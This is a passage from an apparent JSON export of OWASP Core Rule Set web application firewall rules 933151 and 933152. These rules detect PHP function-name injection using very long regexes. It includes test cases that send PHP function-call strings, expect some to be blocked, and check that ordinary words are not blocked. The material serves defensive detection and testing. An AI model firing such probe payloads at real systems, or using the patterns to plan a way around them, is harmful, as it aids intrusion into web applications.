(?:expor|fac|hamdis|testbi)t|gcd(?:ext)?|i(?:mport|n(?:(?:i|ver)t|tval))|jacobi|(?:kronecke|x?o)r|l(?:cm|egendre)|m(?:od|ul)|ne(?:g|xtprime)|p(?:erfect_(?:power|square)|o(?:pcount|wm?)|rob_prime)|r(?:andom_(?:bits|range|seed)|oot(?:rem)?)|s(?:can[01]|etbit|ign|qrt(?:rem)?|trval|ub)))|r(?:apheme_(?:extract|s(?:tr(?:i(?:pos|str)|len|(?:ri?)?pos|str)|ubstr))|egoriantojd)|z(?:(?:un)?compress|(?:de(?:cod|flat)|encod|fil|inflat)e|open))|h(?:ash_(?:(?:algo|equal)s|copy|fi(?:le|nal)|h(?:kdf|mac(?:_(?:algos|file))?)|init|pbkdf2|update(?:_(?:file|stream))?)|e(?:ader(?:_re(?:gister_callback|move)|s_(?:lis|sen)t)|brev|x(?:2bin|dec))|ighlight_(?:file|string)|rtime|t(?:ml(?:(?:_entity|specialchars)_decode|entities)|tp_(?:build_query|response_code))|ypot)|i(?:conv(?:_(?:get_encoding|mime_(?:decode(?:_headers)?|encode)|s(?:et_encoding|tr(?:len|r?pos)|ubstr)))?|dn_to_(?:ascii|utf8)|gnore_user_abort|ma(?:ge(?:_type_to_(?:extension|mime_type)|a(?:ffine(?:matrix(?:conca|ge)t)?|lphablending|ntialias|rc|vif)|(?:bm|w(?:bm|eb))p|c(?:har(?:up)?|o(?:lor(?:a(?:llocate(?:alpha)?|t)|closest(?:alpha|hwb)?|deallocate|(?:exact|resolve)(?:alpha)?|match|s(?:et|forindex|total)|transparent)|nvolution|py(?:merge(?:gray)?|res(?:ampl|iz)ed)?)|r(?:eate(?:from(?:avif|(?:bm|w(?:bm|eb))p|g(?:d(?:2(?:part)?)?|if)|(?:jpe|(?:p|stri)n)g|tga|x[bp]m)|truecolor)?|op(?:auto)?))|d(?:ashedline|estroy)|ellipse|f(?:il(?:l(?:ed(?:arc|(?:ellips|rectangl)e|polygon)|toborder)?|ter)|lip|ont(?:height|width)|t(?:bbox|text))|g(?:ammacorrect|d2?|et(?:clip|interpolation)|if|rab(?:screen|window))|i(?:nterlace|struecolor)|jpeg|l(?:(?:ayereffec|oadfon)t|ine)|openpolygon|p(?:alette(?:copy|totruecolor)|ng|olygon)|r(?:e(?:ctangle|solution)|otate)|s(?:avealpha|cale|et(?:brush|clip|interpolation|pixel|style|t(?:hickness|ile))|tring(?:up)?|[xy])|t(?:ruecolortopalette|ypes)|xbm)|p_(?:(?:8bi|qprin)t|a(?:lerts|ppend)|b(?:ase64|inary|ody(?:struct)?)|c(?:heck|l(?:earflag_full|ose)|reatemailbox)|delete(?:mailbox)?|e(?:rrors|xpunge)|fetch(?:_overview|body|header|(?:mim|structur)e)|g(?:c|et(?:_quota(?:root)?|acl|mailboxes|subscribed))|header(?:info|s)|(?:is_)?open|l(?:ast_error|ist(?:scan)?|sub)|m(?:ail(?:_(?:co(?:mpose|py)|move)|boxmsginfo)?|ime_header_decode|sgno|utf7_to_utf8)|num_(?:msg|recent)|ping|r(?:e(?:namemailbox|open)|fc822_(?:parse_(?:adrlist|headers)|write_address))|s(?:avebody|e(?:arch|t(?:_quota|(?:ac|flag_ful)l))|ort|tatus|ubscribe)|t(?:hread|imeout)|u(?:id|n(?:delet|subscrib)e|tf(?:7_(?:de|en)code|8(?:_to_mutf7)?))))|n(?:_array|et_(?:ntop|pton)|flate_(?:add|get_(?:read_len|status)|init)|i_(?:get(?:_all)?|parse_quantity|restore|set)|t(?:div|erface_exists|l(?:_(?:error_nam|get_error_(?:cod|messag)|is_failur)e|cal_(?:a(?:dd|fter)|(?:befor|f(?:ield_differenc|rom_date_tim)|to_date_tim)e|c(?:lear|reate_instance)|equals|get(?:_(?:a(?:ctual_m(?:ax|in)imum|vailable_locales)|(?:day_of_week_typ|error_(?:cod|messag)|keyword_values_for_local)e|first_day_of_week|greatest_minimum|l(?:east_maximum|ocale)|m(?:aximum|inim(?:al_days_in_first_week|um))|now|(?:(?:repeat|skipp)ed_wall_time_op|weekend_transi)tion|t(?:ime(?:_zone)?|ype)))?|i(?:n_daylight_time|s_(?:equivalent_to|(?:lenien|se)t|weekend))|roll|set(?:_(?:(?:first_day_of|minimal_days_in_first)_week|lenient|(?:repeat|skipp)ed_wall_time_option|time(?:_zone)?))?)|gregcal_(?:(?:create_instanc|[gs]et_gregorian_chang)e|is_leap_year)|tz_(?:c(?:ount_equivalent_ids|reate_(?:default|enumeration|time_zone(?:_id_enumeration)?))|(?:(?:from|to)_date_time_zon|use_daylight_tim)e|get_(?:(?:canonical|windows)_id|d(?:isplay_name|st_savings)|e(?:quivalent_id|rror_(?:cod|messag)e)|(?:gm|offse)t|id(?:_for_windows_id)?|r(?:aw_offset|egion)|(?:tz_data_versio|unknow)n)|has_same_rules))))|p(?:2long|tc(?:embed|parse))|s_(?:bool|(?:(?:(?:c(?:all|ount)|(?:execu|wri)t)ab|uploaded_fi)l|i(?:nfinit|terabl)|re(?:adabl|sourc))e|f(?:i(?:l|nit)e|loat)|link|nan|s(?:calar|oap_fault|tring|ubclass_of))|terator_(?:(?:appl|to_arra)y|count))|j(?:d(?:dayofweek|monthname|to(?:french|gregorian|j(?:ewish|ulian)|unix))|(?:ewish|ulian)tojd|son_(?:last_error(?:_msg)?|validate)))[\\s\\x0b]*\\(", "actions": [ { "act_name": "id", "lineno": 585, "act_quote": "no_quote", "act_arg": "933151", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 586, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 587, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 588, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 589, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 590, "act_quote": "quotes", "act_arg": "PHP Injection Attack: Medium-Risk PHP Function Name Found", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 591, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{TX.933151_MATCHED_VAR_NAME}: %{TX.933151_MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 592, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 593, "act_quote": "quotes", "act_arg": "language-php", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 594, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 595, "act_quote": "quotes", "act_arg": "attack-injection-php", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 596, "act_quote": "quotes", "act_arg": "paranoia-level/2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 597, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 598, "act_quote": "quotes", "act_arg": "OWASP_CRS/ATTACK-PHP", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 599, "act_quote": "quotes", "act_arg": "capec/1000/152/242", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 600, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 601, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 602, "act_quote": "quotes", "act_arg": "tx.933151_matched_var=%{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 603, "act_quote": "quotes", "act_arg": "tx.933151_matched_var_name=%{MATCHED_VAR_NAME}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 604, "act_quote": "quotes", "act_arg": "tx.php_injection_score=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 605, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 584 } }, { "rule_id": "933152", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_COOKIES", "part": "", "negated": false }, { "name": "REQUEST_COOKIES_NAMES", "part": "", "negated": false }, { "name": "REQUEST_FILENAME", "part": "", "negated": false }, { "name": "ARGS_NAMES", "part": "", "negated": false }, { "name": "ARGS", "part": "", "negated": false }, { "name": "XML", "part": "/*", "negated": false } ], "operator": { "type": "@rx", "argument": "(?i)\\b(?:kr?sort|l(?:c(?:first|g_value|h(?:grp|own))|dap_(?:8859_to_t61|(?:ad|bin)d(?:_ext)?|co(?:mpare|nnect(?:_wallet)?|unt_(?:entri|referenc)es)|d(?:elete(?:_ext)?|n2ufn)|e(?:rr(?:(?:2st|o)r|no)|scape|x(?:op(?:_(?:passwd|refresh|sync|whoami))?|plode_dn))|f(?:irst_(?:(?:attribut|referenc)e|entry)|ree_result)|get_(?:(?:attribut|entri)es|(?:d|optio|values_le)n)|list|mod(?:_(?:add|del|replace)(?:_ext)?|ify_batch)|next_(?:(?:attribut|referenc)e|entry)|parse_(?:exop|re(?:ference|sult))|re(?:ad|name(?:_ext)?)|s(?:asl_bind|e(?:arch|t_(?:option|rebind_proc))|tart_tls)|t61_to_8859|unbind)|evenshtein|i(?:bxml_(?:(?:clear|use_internal)_errors|disable_entity_loader|get_(?:e(?:rrors|xternal_entity_loader)|last_error)|set_(?:external_entity_loader|streams_context))|nkinfo|tespeed_(?:finish_request|re(?:quest|sponse)_headers))|o(?:cal(?:e(?:_(?:(?:accept_from_htt|looku)p|(?:c(?:anonicaliz|ompos)|pars)e|filter_matches|get_(?:(?:all_variant|keyword)s|d(?:efault|isplay_(?:(?:languag|nam)e|region|(?:scrip|varian)t))|primary_language|region|script)|set_default)|conv)|time)|g1[0p]|ng2ip)|stat|trim)|m(?:b_(?:c(?:h(?:eck_encoding|r)|onvert_(?:case|encoding|kana|variables))|de(?:code_(?:mimeheader|numericentity)|tect_(?:encoding|order))|e(?:ncod(?:e_(?:mimeheader|numericentity)|ing_aliases)|reg(?:_(?:match|replace(?:_callback)?|search(?:_(?:(?:get(?:po|reg)|(?:set)?po|reg)s|init))?)|i(?:_replace)?)?)|get_info|http_(?:in|out)put|internal_encoding|l(?:anguage|ist_encodings)|o(?:rd|utput_handler)|p(?:arse_str|referred_mime_name)|regex_(?:encoding|set_options)|s(?:crub|end_mail|plit|tr(?:_(?:pad|split)|cut|i(?:mwidth|pos|str)|len|pos|r(?:chr|i(?:chr|pos)|pos)|(?:st|to(?:low|upp)e)r|width)|ubst(?:itute_character|r(?:_count)?)))|(?:(?:d5|ove_uploaded)_fil|e(?:mory_(?:get_(?:peak_)?|reset_peak_)usag|taphon)|i(?:crotim|me_content_typ))e|hash(?:_(?:count|get_(?:block_siz|hash_nam)e|keygen_s2k))?|k(?:dir|time)|sg(?:_(?:(?:get_queu|re(?:ceiv|move_queu))e|queue_exists|s(?:e(?:nd|t_queue)|tat_queue))|fmt_(?:create|(?:format|parse)(?:_message)?|get_(?:(?:error_(?:cod|messag)|local)e|pattern)|set_pattern))|t_(?:getrandmax|s?rand)|ysqli_(?:a(?:ffected_rows|utocommit)|begin_transaction|c(?:ha(?:nge_user|racter_set_name)|lose|o(?:mmit|nnect(?:_err(?:no|or))?))|d(?:ata_seek|ebug|ump_debug_info)|e(?:rr(?:no|or(?:_list)?)|xecute_query)|f(?:etch_(?:a(?:ll|rray|ssoc)|column|field(?:_direct|s)?|lengths|object|row)|ield_(?:count|seek|tell)|ree_result)|get_(?:c(?:harset|lient_(?:info|stats|version)|onnection_stats)|(?:host|proto)_info|(?:links_stat|warning)s|server_(?:info|version))|in(?:fo|it|sert_id)|kill|m(?:ore_results|ulti_query)|n(?:ext_result|um_(?:field|row)s)|options|p(?:ing|oll|repare)|query|r(?:e(?:a(?:l_(?:connect|escape_string|query)|p_async_query)|fresh|(?:lease_savepoin|por)t)|ollback)|s(?:(?:avepoin|sl_se)t|e(?:lect_db|t_charset)|qlstate|t(?:(?:a|ore_resul)t|mt_(?:a(?:ffected_rows|ttr_[gs]et)|bind_(?:param|result)|close|data_seek|e(?:rr(?:no|or(?:_list)?)|xecute)|f(?:etch|(?:ield_coun|ree_resul)t)|get_(?:result|warnings)|in(?:it|sert_id)|more_results|n(?:ext_result|um_rows)|p(?:aram_count|repare)|res(?:et|ult_metadata)|s(?:end_long_data|qlstate|tore_result))))|thread_(?:id|safe)|(?:use_resul|warning_coun)t))|n(?:(?:at(?:case)?sor|gettex)t|et_get_interfaces|l(?:2br|_langinfo)|ormalizer_(?:get_raw_decomposition|is_normalized|normalize)|umfmt_(?:create|(?:format|parse)(?:_currency)?|get_(?:(?:(?:text_)?attribut|error_(?:cod|messag)|local)e|pattern|symbol)|set_(?:(?:text_)?attribute|pattern|symbol)))|o(?:b_(?:clean|end_(?:clean|flush)|(?:implicit_)?flush|g(?:et_(?:c(?:lean|ontents)|flush|le(?:ngth|vel)|status)|zhandler)|list_handlers)|c(?:i(?:_(?:(?:bind_(?:array_)?|define_)by_name|c(?:ancel|l(?:ient_version|ose)|o(?:llection_(?:a(?:ppend|ssign)|element_(?:assign|get)|max|size|trim)|(?:mmi|nnec)t))|e(?:rror|xecute)|f(?:etch(?:_(?:a(?:ll|rray|ssoc)|object|row))?|ield_(?:is_null|(?:nam|s(?:cal|iz))e|precision|type(?:_raw)?)|ree_(?:collection|descriptor|statement))|get_implicit_resultset|lob_(?:(?:appen|loa|re(?:a|win))d|copy|e(?:of|rase|xport)|flush|i(?:mport|s_equal)|s(?:(?:av|iz)e|eek)|t(?:ell|runcate)|write)|n(?:ew_(?:c(?:o(?:llection|nnect)|ursor)|descriptor)|um_(?:field|row)s)|p(?:a(?:rs|ssword_chang)e|connect)|r(?:e(?:gister_taf_callback|sult)|ollback)|s(?:e(?:rver_version|t_(?:(?:ac|db_opera|edi)tion|c(?:all_timeout|lient_i(?:dentifier|nfo))|module_name|prefetch(?:_lob)?))|tatement_type)|unregister_taf_callback)|fetchinto|[gs]etbufferinglob)|tdec)|dbc_(?:autocommit|(?:binmod|data_sourc)e|c(?:lose(?:_all)?|o(?:lumn(?:privilege)?s|mmit|nnect(?:ion_string_(?:is_quoted|(?:should_)?quote))?)|ursor)|e(?:rror(?:msg)?|xec(?:ute)?)|f(?:etch_(?:array|into|object|row)|ield_(?:len|n(?:ame|um)|(?:scal|typ)e)|oreignkeys|ree_result)|gettypeinfo|longreadlen|n(?:ext_result|um_(?:field|row)s)|p(?:connect|r(?:epare|(?:imarykey|ocedure(?:column)?)s))|r(?:esult(?:_all)?|ollback)|s(?:etoption|(?:pecialcolumn|tatistic)s)|table(?:privilege)?s)|p(?:cache_(?:compile_file|get_(?:configuration|status)|i(?:nvalidate|s_script_cached)|reset)|en(?:dir|log|ssl_(?:c(?:ipher_(?:iv|key)_length|ms_(?:(?:de|en)crypt|read|sign|verify)|sr_(?:export(?:_to_file)?|get_(?:public_key|subject)|new|sign))|d(?:(?:ecryp|iges)t|h_compute_key)|e(?:ncrypt|rror_string)|(?:get_(?:c(?:ert_location|ipher_method|urve_name)|md_method)|random_pseudo_byte)s|open|p(?:bkdf2|k(?:cs(?:12_(?:export(?:_to_file)?|read)|7_(?:(?:de|en)crypt|read|sign|verify))|ey_(?:(?:deriv|fre)e|export(?:_to_file)?|get_(?:details|p(?:rivate|ublic))|new))|(?:rivate|ublic)_(?:de|en)crypt)|s(?:eal|ign|pki_(?:export(?:_challenge)?|new|verify))|verify|x509_(?:check(?:_private_key|purpose)|export(?:_to_file)?|f(?:ingerprint|ree)|parse|read|verify))))|utput_(?:add_rewrite_var|reset_rewrite_vars))|p(?:a(?:rse_(?:ini_(?:file|string)|str)|ss(?:thru|word_(?:algos|get_info|(?:needs_re)?hash|verify))|thinfo)|c(?:lose|ntl_(?:a(?:larm|sync_signals)|exec|forkx?|get(?:_last_error|priority)|rfork|s(?:etpriority|ig(?:nal(?:_(?:dispatch|get_handler))?|procmask|timedwait|waitinfo)|trerror)|unshare|w(?:ait(?:pid)?|exitstatus|if(?:continu|exit|s(?:ignal|topp))ed|(?:stop|term)sig)))|do_drivers|fsockopen|g_(?:(?:affected_row|num_(?:field|row)|option)s|c(?:ancel_query|l(?:ient_encoding|ose)|o(?:n(?:nect(?:_poll|ion_(?:busy|reset|status))?|(?:sume_inpu|ver)t)|py_(?:from|to)))|d(?:bnam|elet)e|e(?:n(?:d_copy|ter_pipeline_mode)|scape_(?:bytea|identifier|literal|string)|x(?:ecut|it_pipeline_mod)e)|f(?:etch_(?:a(?:ll(?:_columns)?|rray|ssoc)|object|r(?:esult|ow))|ield(?:_(?:is_null|n(?:ame|um)|prtlen|size|t(?:able|ype(?:_oid)?))|isnull|prtlen)|lush|ree_result)|get_(?:notify|pid|result)|(?:hos|inser)t|l(?:ast_(?:error|notice|oid)|o_(?:(?:c(?:los|reat)|writ)e|(?:ex|im)port|open|read(?:_all)?|(?:see|unlin)k|t(?:ell|runcate)))|meta_data|p(?:arameter_status|(?:connec|or)t|i(?:ng|peline_s(?:tatus|ync))|(?:repar|ut_lin)e)|query(?:_params)?|result_(?:error(?:_field)?|s(?:eek|tatus))|s(?:e(?:lect|nd_(?:(?:execut|prepar)e|query(?:_params)?)|t_(?:client_encoding|error_(?:context_visibil|verbos)ity))|ocket)|t(?:ra(?:ce|nsaction_status)|ty)|u(?:n(?:escape_bytea|trace)|pdate)|version)|hp(?:_(?:ini_(?:loaded_file|scanned_files)|(?:s(?:api_nam|trip_whitespac)|unam)e)|credits|dbg_(?:break_(?:f(?:ile|unction)|method|next)|c(?:lea|olo)r|e(?:nd_oplog|xec)|get_executable|prompt|start_oplog)|info|version)|osix_(?:e?access|ctermid|f?pathconf|get(?:_last_error|(?:cw|(?:e[gu]|[su])i)d|g(?:id|r(?:gid|nam|oups))|login|p(?:g(?:id|rp)|p?id|w(?:nam|uid))|rlimit)|i(?:nitgroups|satty)|kill|mk(?:fifo|nod)|s(?:et(?:(?:e[gu]|p?g|[su])id|rlimit)|trerror|ysconf)|t(?:imes|tyname)|uname)|r(?:eg_(?:filter|grep|last_error(?:_msg)?|match_all|quote|replace_callback(?:_array)?|split)|o(?:c_(?:(?:clos|nic|terminat)e|get_status|open)|perty_exists))|spell_(?:add_to_(?:personal|session)|c(?:heck|lear_session|onfig_(?:(?:creat|ignor|mod)e|d(?:ata|ict)_dir|(?:persona|save_rep)l|r(?:epl|untogether)))|new(?:_(?:config|personal))?|s(?:(?:ave_wordli|ugge)s|tore_replacemen)t)|utenv)|quote(?:d_printable_(?:de|en)code|meta))[\\s\\x0b]*\\(", "negated": false } }, "transformations": [ "none" ], "metadata": { "phase": "2", "message": "PHP Injection Attack: Medium-Risk PHP Function Name Found", "logdata": "Matched Data: %{TX.0} found within %{TX.933152_MATCHED_VAR_NAME}: %{TX.933152_MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-injection-php" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-php", "platform-multi", "attack-injection-php", "paranoia-level/2", "OWASP_CRS", "OWASP_CRS/ATTACK-PHP", "capec/1000/152/242" ] }, "test_cases": [ { "description": "pmf + chain", "test_id": 1, "request": { "method": "GET", "uri": "/get/pg_enter_pipeline_mode%20%28", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 933152 ] }, "malicious_patterns": [] }, { "description": "pmf + chain", "test_id": 2, "request": { "method": "GET", "uri": "/get?ldap_get_entries%28%29", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 933152 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "ldap_get_entries%28%29" } ] }, { "description": "non-dangerous PHP functions, removed to reduce FP", "test_id": 3, "request": { "method": "GET", "uri": "/get?foo=filemtime%28%24foo%29", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 933152 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "foo=filemtime%28%24foo%29" } ] }, { "description": "pmf + chain", "test_id": 4, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "odbc_connection_string_should_quote(" }, "expected": { "should_block": true, "rule_ids": [ 933152 ] }, "malicious_patterns": [ { "location": "post_body", "value": "odbc_connection_string_should_quote(" } ] }, { "description": "No parenthesis after keyword", "test_id": 5, "request": { "method": "GET", "uri": "/get?foo=mb_stristr", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 933152 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "foo=mb_stristr" } ] }, { "description": "rule should not trigger when there are other words before parenthesis (`openlog` should not be matched)", "test_id": 6, "request": { "method": "GET", "uri": "/get?a=openlogfile(foo)", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 933152 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "a=openlogfile(foo)" } ] }, { "description": "snippets of Eng words (like prev) should not be matched, requiring regex match with word boundaries (e.g. 933160)", "test_id": 7, "request": { "method": "GET", "uri": "/get?a=preview", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 933152 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "a=preview" } ] }, { "description": "snippets of Eng words (like exp) should not be matched, requiring regex match with word boundaries (e.g. 933160)", "test_id": 8, "request": { "method": "GET", "uri": "/get?a=exploration", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 933152 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "a=exploration" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 614, "variables": [ { "variable": "REQUEST_COOKIES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_COOKIES_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_FILENAME", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "XML", "variable_part": "/*", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "(?i)\\b(?:kr?sort|l(?:c(?:first|g_value|h(?:grp|own))|dap_(?:8859_to_t61|(?:ad|bin)d(?:_ext)?|co(?:mpare|nnect(?:_wallet)?|unt_(?:entri|referenc)es)|d(?:elete(?:_ext)?|n2ufn)|e(?:rr(?:(?:2st|o)r|no)|scape|x(?:op(?:_(?:passwd|refresh|sync|whoami))?|plode_dn))|f(?:irst_(?:(?:attribut|referenc)e|entry)|ree_result)|get_(?:(?:attribut|entri)es|(?:d|optio|values_le)n)|list|mod(?:_(?:add|del|replace)(?:_ext)?|ify_batch)|next_(?:(?:attribut|referenc)e|entry)|parse_(?:exop|re(?:ference|sult))|re(?:ad|name(?:_ext)?)|s(?:asl_bind|e(?:arch|t_(?:option|rebind_proc))|tart_tls)|t61_to_8859|unbind)|evenshtein|i(?:bxml_(?:(?:clear|use_internal)_errors|disable_entity_loader|get_(?:e(?:rrors|xternal_entity_loader)|last_error)|set_(?:external_entity_loader|streams_context))|nkinfo|tespeed_(?:finish_request|re(?:quest|sponse)_headers))|o(?:cal(?:e(?:_(?:(?:accept_from_htt|looku)p|(?:c(?:anonicaliz|ompos)|pars)e|filter_matches|get_(?:(?:all_variant|keyword)s|d(?:efault|isplay_(?:(?:languag|nam)e|region|(?:scrip|varian)t))|primary_language|region|script)|set_default)|conv)|time)|g1[0p]|ng2ip)|stat|trim)|m(?:b_(?:c(?:h(?:eck_encoding|r)|onvert_(?:case|encoding|kana|variables))|de(?:code_(?:mimeheader|numericentity)|tect_(?:encoding|order))|e(?:ncod(?:e_(?:mimeheader|numericentity)|ing_aliases)|reg(?:_(?:match|replace(?:_callback)?|search(?:_(?:(?:get(?:po|reg)|(?:set)?po|reg)s|init))?)|i(?:_replace)?)?)|get_info|http_(?:in|out)put|internal_encoding|l(?:anguage|ist_encodings)|o(?:rd|utput_handler)|p(?:arse_str|referred_mime_name)|regex_(?:encoding|set_options)|s(?:crub|end_mail|plit|tr(?:_(?:pad|split)|cut|i(?:mwidth|pos|str)|len|pos|r(?:chr|i(?:chr|pos)|pos)|(?:st|to(?:low|upp)e)r|width)|ubst(?:itute_character|r(?:_count)?)))|(?:(?:d5|ove_uploaded)_fil|e(?:mory_(?:get_(?:peak_)?|reset_peak_)usag|taphon)|i(?:crotim|me_content_typ))e|hash(?:_(?:count|get_(?:block_siz|hash_nam)e|keygen_s2k))?|k(?:dir|time)|sg(?:_(?:(?:get_queu|re(?:ceiv|move_queu))e|queue_exists|s(?:e(?:nd|t_queue)|tat_queue))|fmt_(?:create|(?:format|parse)(?:_message)?|get_(?:(?:error_(?:cod|messag)|local)e|pattern)|set_pattern))|t_(?:getrandmax|s?rand)|ysqli_(?:a(?:ffected_rows|utocommit)|begin_transaction|c(?:ha(?:nge_user|racter_set_name)|lose|o(?:mmit|nnect(?:_err(?:no|or))?))|d(?:ata_seek|ebug|ump_debug_info)|e(?:rr(?:no|or(?:_list)?)|xecute_query)|f(?:etch_(?:a(?:ll|rray|ssoc)|column|field(?:_direct|s)?|lengths|object|row)|ield_(?:count|seek|tell)|ree_result)|get_(?:c(?:harset|lient_(?:info|stats|version)|onnection_stats)|(?:host|proto)_info|(?:links_stat|warning)s|server_(?:info|version))|in(?:fo|it|sert_id)|kill|m(?:ore_results|ulti_query)|n(?:ext_result|um_(?:field|row)s)|options|p(?:ing|oll|repare)|query|r(?:e(?:a(?:l_(?:connect|escape_string|query)|p_async_query)|fresh|(?:lease_savepoin|por)t)|ollback)|s(?:(?:avepoin|sl_se)t|e(?:lect_db|t_charset)|qlstate|t(?:(?:a|ore_resul)t|mt_(?:a(?:ffected_rows|ttr_[gs]et)|bind_(?:param|result)|close|data_seek|e(?:rr(?:no|or(?:_list)?)|xecute)|f(?:etch|(?:ield_coun|ree_resul)t)|get_(?:result|warnings)|in(?:it|sert_id)|more_results|n(?:ext_result|um_rows)|p(?:aram_count|repare)|res(?:et|ult_metadata)|s(?:end_long_data|qlstate|tore_result))))|thread_(?:id|safe)|(?:use_resul|warning_coun)t))|n(?:(?:at(?:case)?sor|gettex)t|et_get_interfaces|l(?:2br|_langinfo)|ormalizer_(?:get_raw_decomposition|is_normalized|normalize)|umfmt_(?:create|(?:format|parse)(?:_currency)?|get_(?:(?:(?:text_)?attribut|error_(?:cod|messag)|local)e|pattern|symbol)|set_(?:(?:text_)?attribute|pattern|symbol)))|o(?:b_(?:clean|end_(?:clean|flush)|(?:implicit_)?flush|g(?:et_(?:c(?:lean|ontents)|flush|le(?:ngth|vel)|status)|zhandler)|list_handlers)|c(?:i(?:_(?:(?:bind_(?:array_)?|define_)by_name|c(?:ancel|l(?:ient_version|ose)|o(?:llection_(?:a(?:ppend|ssign)|element_(?:assign|get)|max|size|trim)|(?:mmi|nnec)t))|e(?:rror|xecute)|f(?:etch(?:_(?:a(?:ll|rray|ssoc)|object|row))?|ield_(?:is_null|(?:nam|s(?:cal|iz))e|precision|type(?:_raw)?)|ree_(?:collection|descriptor|statement))|get_implicit_resultset|lob_(?:(?:appen|loa|re(?:a|win))d|copy|e(?:of|rase|xport)|flush|i(?:mpor